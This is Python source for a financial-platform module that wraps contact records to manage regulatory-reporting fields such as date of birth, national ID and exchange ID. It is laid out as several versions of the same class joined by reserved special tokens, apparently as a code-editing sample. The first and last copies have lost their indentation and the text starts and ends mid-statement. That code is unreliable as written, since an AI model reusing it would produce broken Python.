'dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',
self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',
self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(
'nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(
'regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(
'regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(
'regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(
'uniqueName', self.__contact)
<|reserved_special_token_0|>
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id=VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = (
'The ExchangeId provided <%s> is not of the expected integer format'
% str(exchange_id))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.
__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
<|reserved_special_token_0|>
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
elif hasattr(self, attr):
getattr(self, attr)(val)
<|reserved_special_token_0|>
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
    """Regulatory-reporting view of an acm.FContact: caches the regulatory
    add-info/column values and reads/writes them through accessor methods."""

    def __init__(self, contact=None):
        """class that maintains all data related to the regulatory on the FContact"""
        try:
            self.__contact = contact
            if not self.__contact:
                FRegulatoryLogger.ERROR(logger, 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object')
                return None
            # Start with an empty cache; __refresh fills it from the contact.
            self.__reg_date_of_birth = None
            self.__reg_first_name = None
            self.__reg_last_name = None
            self.__reg_national_id = None
            self.__reg_crm_id = None
            self.__crm_id_source = None
            self.__reg_exchange_id = None
            self.__reg_unique_name = None
            self.__client_type = None
            self.__is_general_partner = None
            if contact:
                self.__refresh(contact)
            self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
        except Exception as e:
            FRegulatoryLogger.ERROR(logger, str(e))

    def __refresh(self, contact):
        """Pull every regulatory add-info value from the contact into the cache."""
        self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)
        self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)
        self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)
        self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)
        self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)
        self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)
        self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)
        try:
            # Prefer the native column accessor; fall back to the add-info.
            self.__reg_unique_name = self.__contact.UniqueName()
        except:
            self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)

    def Contact(self):
        """returns the contact for which this wrapper has all the addinfo/column values"""
        return self.__contact

    def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
        """Date of birth of the concerned natural person"""
        parsed_dob = None
        if reg_date_of_birth == VALUE_NOT_SET:
            # Getter path.
            return self.__reg_date_of_birth
        try:
            parsed_dob = ael.date_from_string(reg_date_of_birth)
        except:
            if reg_date_of_birth not in ['', None]:
                msg = 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo' % reg_date_of_birth
                FRegulatoryLogger.ERROR(logger, msg)
                raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
        # Only a successfully parsed date is kept; anything else clears it.
        self.__reg_date_of_birth = reg_date_of_birth if parsed_dob else None
        try:
            self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)
        except:
            pass

    def FirstName(self, reg_first_name=VALUE_NOT_SET):
        """First name of the concerned natural person"""
        if reg_first_name == VALUE_NOT_SET:
            # Getter path; falsy cached values are normalized to None.
            if not self.__reg_first_name:
                self.__reg_first_name = None
            return self.__reg_first_name
        self.__reg_first_name = reg_first_name
        try:
            self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)
        except:
            pass

    def LastName(self, reg_last_name=VALUE_NOT_SET):
        """Last name of the concerned natural person"""
        if reg_last_name == VALUE_NOT_SET:
            if not self.__reg_last_name:
                self.__reg_last_name = None
            return self.__reg_last_name
        self.__reg_last_name = reg_last_name
        try:
            self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
        except:
            pass

    def NationalId(self, reg_national_id=VALUE_NOT_SET):
        """NationalId of the concerned natural person"""
        if reg_national_id == VALUE_NOT_SET:
            if not self.__reg_national_id:
                self.__reg_national_id = None
            return self.__reg_national_id
        self.__reg_national_id = reg_national_id
        try:
            self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)
        except:
            pass

    def CrmId(self, crm_id=VALUE_NOT_SET):
        """CrmId of the concerned natural person"""
        if crm_id == VALUE_NOT_SET:
            if not self.__reg_crm_id:
                self.__reg_crm_id = None
            return self.__reg_crm_id
        self.__reg_crm_id = crm_id
        try:
            self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)
        except:
            pass

    def ExchangeId(self, exchange_id=VALUE_NOT_SET):
        """The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
        if exchange_id == VALUE_NOT_SET:
            if not self.__reg_exchange_id:
                self.__reg_exchange_id = None
            return self.__reg_exchange_id
        exchange_id_text = str(exchange_id)
        if exchange_id_text.isdigit():
            self.__reg_exchange_id = int(exchange_id)
        elif exchange_id_text in ['None', '']:
            self.__reg_exchange_id = None
        else:
            msg = 'The ExchangeId provided <%s> is not of the expected integer format' % str(exchange_id)
            FRegulatoryLogger.ERROR(logger, msg)
            raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
        try:
            self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)
        except:
            pass

    def UniqueName(self, unique_name=VALUE_NOT_SET):
        """An optional unique name, if specified there can only be one contact with this name for each party."""
        if unique_name == VALUE_NOT_SET:
            if not self.__reg_unique_name:
                self.__reg_unique_name = None
            return self.__reg_unique_name
        try:
            if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:
                # ACM >= 2017.2 stores the unique name as a native column.
                self.__contact.UniqueName(unique_name)
            else:
                # Older versions: verify uniqueness before writing the add-info.
                name_is_unique, clashing_contact = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)
                if name_is_unique:
                    try:
                        self.__contact.AdditionalInfo().UniqueName(unique_name)
                    except:
                        pass
                else:
                    msg = 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.' % (unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), clashing_contact)
                    FRegulatoryLogger.ERROR(logger, msg)
                    raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
            self.__reg_unique_name = unique_name
        except Exception as e:
            FRegulatoryLogger.ERROR(logger, str(e))
            raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))

    def ClientType(self):
        """returns the ClientType based on where the CrmId is found on the linked objects"""
        self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
        return self.__client_type

    def JointAccount(self):
        """Another trader that jointly owns the account with this trader"""
        if not self.IsGeneralPartner():
            FRegulatoryLogger.WARN(logger, '<%s> is not a General Partner. Hence JointAccount is None' % self.__contact.Fullname())
            return None
        # All general-partner contacts of the same party share the account.
        return [partner for partner in self.__contact.Party().Contacts()
                if partner.AdditionalInfo().RegGeneralPartner()]

    def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
        """General partner has responsibility for the actions of the business, can legally bind
        the business and is personally liable for all the business's debts and obligations."""
        if is_general_partner == VALUE_NOT_SET:
            # Getter path: an unset value is reported as False.
            if str(self.__is_general_partner) == 'None':
                FRegulatoryLogger.DEBUG(logger, 'The IsGeneralPartner is None. Hence defaulting it to False')
                self.__is_general_partner = False
            return self.__is_general_partner
        self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')
        FRegulatoryLogger.DEBUG(logger, 'The IsGeneralPartner is being set to <%s>.' % str(self.__is_general_partner))
        try:
            self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)
        except:
            pass

    def __setattr__(self, attr, val):
        # Private (underscore/mangled) names are stored directly; public names
        # are routed to the accessor method of the same name.
        if attr.startswith('_'):
            super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
        else:
            if hasattr(self, attr):
                getattr(self, attr)(val)

    def Commit(self):
        """Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
        try:
            acm.BeginTransaction()
            self.__contact.Commit()
            if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:
                # Pre-2015.4: add-infos must be written one by one.
                addinfo_values = [
                    ('DateOfBirth', self.__reg_date_of_birth),
                    ('FirstName', self.__reg_first_name),
                    ('LastName', self.__reg_last_name),
                    ('NationalId', self.__reg_national_id),
                    ('RegContactCrmId', self.__reg_crm_id),
                    ('RegContExchangeId', self.__reg_exchange_id),
                    ('UniqueName', self.__reg_unique_name),
                    ('RegGeneralPartner', self.__is_general_partner),
                ]
                for addinfo_name, addinfo_value in addinfo_values:
                    self.__integration_utils.set_additional_info(addinfo_name, self.__contact, addinfo_value)
            acm.CommitTransaction()
        except Exception as e:
            FRegulatoryLogger.ERROR(logger, str(e))
            FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')
            acm.AbortTransaction()

    def Delete(self):
        """Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
        FRegulatoryUtils.Delete(self.__contact, 'Contact')
        FRegulatoryLogger.DEBUG(logger, 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting')

    def Attributes(self):
        """returns the attributes on the FContactRegulatoryInfoBase instance"""
        return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
    """Wrapper exposing the regulatory-reporting attributes stored on an
    acm.FContact, plus query helpers (RegulatoryInfo, Select)."""

    def __init__(self, contact=None):
        """class that maintains all data related to the regulatory on the FContact

        contact -- an acm.FContact instance; if falsy an error is logged and
        the wrapper is left uninitialized.
        """
        try:
            self.__contact = contact
            if not self.__contact:
                FRegulatoryLogger.ERROR(logger, 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object')
                return None
            # Cached regulatory values; populated from the contact by __refresh.
            self.__reg_date_of_birth = None
            self.__reg_first_name = None
            self.__reg_last_name = None
            self.__reg_national_id = None
            self.__reg_crm_id = None
            self.__crm_id_source = None
            self.__reg_exchange_id = None
            self.__reg_unique_name = None
            self.__client_type = None
            self.__is_general_partner = None
            if contact:
                self.__refresh(contact)
            self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
        except Exception as e:
            FRegulatoryLogger.ERROR(logger, str(e))

    def __refresh(self, contact):
        """Reload every cached regulatory value from the contact's add-infos."""
        self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)
        self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)
        self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)
        self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)
        self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)
        self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)
        self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)
        try:
            # UniqueName exists as a column on newer ACM versions; fall back
            # to the add-info when the column accessor is unavailable.
            self.__reg_unique_name = self.__contact.UniqueName()
        except:
            self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)

    def Contact(self):
        """returns the contact for which this wrapper has all the addinfo/column values"""
        return self.__contact

    def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
        """Date of birth of the concerned natural person.

        No argument: getter. With an argument: validated via
        ael.date_from_string; invalid non-empty values raise
        FRegInfoInvalidData, ''/None clears the stored value.
        """
        ael_reg_dob = None
        if reg_date_of_birth != VALUE_NOT_SET:
            try:
                ael_reg_dob = ael.date_from_string(reg_date_of_birth)
            except:
                if reg_date_of_birth not in ['', None]:
                    msg = 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo' % reg_date_of_birth
                    FRegulatoryLogger.ERROR(logger, msg)
                    raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
            if ael_reg_dob:
                self.__reg_date_of_birth = reg_date_of_birth
            else:
                self.__reg_date_of_birth = None
            try:
                self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)
            except:
                pass
        else:
            return self.__reg_date_of_birth

    def FirstName(self, reg_first_name=VALUE_NOT_SET):
        """First name of the concerned natural person"""
        if reg_first_name != VALUE_NOT_SET:
            self.__reg_first_name = reg_first_name
            try:
                self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)
            except:
                pass
        else:
            # Falsy cached values are normalized to None on read.
            if not self.__reg_first_name:
                self.__reg_first_name = None
            return self.__reg_first_name

    def LastName(self, reg_last_name=VALUE_NOT_SET):
        """Last name of the concerned natural person"""
        if reg_last_name != VALUE_NOT_SET:
            self.__reg_last_name = reg_last_name
            try:
                self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
            except:
                pass
        else:
            if not self.__reg_last_name:
                self.__reg_last_name = None
            return self.__reg_last_name

    def NationalId(self, reg_national_id=VALUE_NOT_SET):
        """NationalId of the concerned natural person"""
        if reg_national_id != VALUE_NOT_SET:
            self.__reg_national_id = reg_national_id
            try:
                self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)
            except:
                pass
        else:
            if not self.__reg_national_id:
                self.__reg_national_id = None
            return self.__reg_national_id

    def CrmId(self, crm_id=VALUE_NOT_SET):
        """CrmId of the concerned natural person"""
        if crm_id != VALUE_NOT_SET:
            self.__reg_crm_id = crm_id
            try:
                self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)
            except:
                pass
        else:
            if not self.__reg_crm_id:
                self.__reg_crm_id = None
            return self.__reg_crm_id

    def ExchangeId(self, exchange_id=VALUE_NOT_SET):
        """The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
        if exchange_id != VALUE_NOT_SET:
            if str(exchange_id).isdigit():
                self.__reg_exchange_id = int(exchange_id)
            elif str(exchange_id) in ['None', '']:
                self.__reg_exchange_id = None
            else:
                msg = 'The ExchangeId provided <%s> is not of the expected integer format' % str(exchange_id)
                FRegulatoryLogger.ERROR(logger, msg)
                raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
            try:
                self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)
            except:
                pass
        else:
            if not self.__reg_exchange_id:
                self.__reg_exchange_id = None
            return self.__reg_exchange_id

    def UniqueName(self, unique_name=VALUE_NOT_SET):
        """An optional unique name, if specified there can only be one contact with this name for each party."""
        if unique_name != VALUE_NOT_SET:
            try:
                if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:
                    # Native column support from ACM 2017.2 onwards.
                    self.__contact.UniqueName(unique_name)
                else:
                    # Older versions: enforce uniqueness manually via the add-info.
                    is_unique, contact_name = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)
                    if is_unique:
                        try:
                            self.__contact.AdditionalInfo().UniqueName(unique_name)
                        except:
                            pass
                    else:
                        msg = 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.' % (unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), contact_name)
                        FRegulatoryLogger.ERROR(logger, msg)
                        raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
                self.__reg_unique_name = unique_name
            except Exception as e:
                FRegulatoryLogger.ERROR(logger, str(e))
                raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
        else:
            if not self.__reg_unique_name:
                self.__reg_unique_name = None
            return self.__reg_unique_name

    def ClientType(self):
        """returns the ClientType based on where the CrmId is found on the linked objects"""
        self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
        return self.__client_type

    def JointAccount(self):
        """Another trader that jointly owns the account with this trader"""
        joint_accounts = []
        if self.IsGeneralPartner():
            for contact in self.__contact.Party().Contacts():
                if contact.AdditionalInfo().RegGeneralPartner():
                    joint_accounts.append(contact)
        else:
            FRegulatoryLogger.WARN(logger, '<%s> is not a General Partner. Hence JointAccount is None' % self.__contact.Fullname())
            joint_accounts = None
        return joint_accounts

    def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
        """General partner has responsibility for the actions of the business, can legally bind
        the business and is personally liable for all the business's debts and obligations."""
        if is_general_partner != VALUE_NOT_SET:
            self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')
            FRegulatoryLogger.DEBUG(logger, 'The IsGeneralPartner is being set to <%s>.' % str(self.__is_general_partner))
            try:
                self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)
            except:
                pass
        else:
            if str(self.__is_general_partner) == 'None':
                FRegulatoryLogger.DEBUG(logger, 'The IsGeneralPartner is None. Hence defaulting it to False')
                self.__is_general_partner = False
            return self.__is_general_partner

    def __setattr__(self, attr, val):
        # Private/mangled attributes are stored normally; public attribute
        # assignment dispatches to the accessor method of the same name.
        if attr.startswith('_'):
            super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
        elif hasattr(self, attr):
            getattr(self, attr)(val)

    def Commit(self):
        """Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
        try:
            acm.BeginTransaction()
            self.__contact.Commit()
            if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:
                # Pre-2015.4 versions require each add-info to be written explicitly.
                self.__integration_utils.set_additional_info('DateOfBirth', self.__contact, self.__reg_date_of_birth)
                self.__integration_utils.set_additional_info('FirstName', self.__contact, self.__reg_first_name)
                self.__integration_utils.set_additional_info('LastName', self.__contact, self.__reg_last_name)
                self.__integration_utils.set_additional_info('NationalId', self.__contact, self.__reg_national_id)
                self.__integration_utils.set_additional_info('RegContactCrmId', self.__contact, self.__reg_crm_id)
                self.__integration_utils.set_additional_info('RegContExchangeId', self.__contact, self.__reg_exchange_id)
                self.__integration_utils.set_additional_info('UniqueName', self.__contact, self.__reg_unique_name)
                self.__integration_utils.set_additional_info('RegGeneralPartner', self.__contact, self.__is_general_partner)
            acm.CommitTransaction()
        except Exception as e:
            FRegulatoryLogger.ERROR(logger, str(e))
            FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')
            acm.AbortTransaction()

    def Delete(self):
        """Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
        FRegulatoryUtils.Delete(self.__contact, 'Contact')
        FRegulatoryLogger.DEBUG(logger, 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting')

    def Attributes(self):
        """returns the attributes on the FContactRegulatoryInfoBase instance"""
        return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)

    def RegulatoryInfo(self):
        """returns the FContactRegulatoryInfoBase instance for the given contact"""
        # NOTE(review): FContactRegulatoryInfo is expected to be defined
        # elsewhere in this module/package (a subclass of this base); this
        # method appears intended to be patched onto acm.FContact -- confirm.
        contactRegInfo = FContactRegulatoryInfo(self)
        return contactRegInfo

    @staticmethod
    def Select(query):
        """Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query"""
        # Fix: originally declared inside the class without 'self' and without
        # @staticmethod, which broke instance access (and unbound-method calls
        # on Python 2). @staticmethod keeps class-level calls working unchanged.
        party = None
        if query.find('and party') != -1:
            # Split off the trailing "and party = '<name>'" clause and resolve
            # the party separately; the remaining query is passed through.
            pos = query.find('and party')
            party_name = query[pos + len('and party'):]
            query = query[0:pos]
            party_name = party_name.replace('=', '').replace("'", '')
            party_name = party_name.strip()
            party = acm.FParty[party_name]
        return_result = FRegulatoryUtils.Select(query, 'FContact', party)
        return return_result
<|reserved_special_token_1|>
"""------------------------------------------------------------------------
MODULE
FContactRegulatoryInfoBase -
DESCRIPTION:
This file provides the custom instance of RegulatoryInfo on the Contact which has all the RegulatoryInfo related methods
VERSION: 1.0.25(0.25.7)
RESTRICTIONS/ LIMITATIONS:
1. Any modifications to the scripts/ encrypted modules/ clear text code within the core is not supported.
2. This module is not customizable
3. The component may not work as expected with any modifications done to this module at user end
--------------------------------------------------------------------------"""
import string
import acm
import FIntegrationUtils
import FRegulatoryLogger
import ael
import FRegulatoryUtils
import FRegulatoryInfoException
logger = 'FContactRegulatoryInfoBase'
VALUE_NOT_SET = ()
class FContactRegulatoryInfoBase(object):
def __init__(self, contact = None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger, "The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object")
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e :
FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)
def Contact(self):
"""returns the contact for which this wrapper has all the addinfo/column values"""
return self.__contact
def DateOfBirth(self, reg_date_of_birth = VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = "The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo"%reg_date_of_birth
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name = VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name = VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id = VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id = VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id = VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = "The ExchangeId provided <%s> is not of the expected integer format"%str(exchange_id)
FRegulatoryLogger.ERROR(logger, msg)
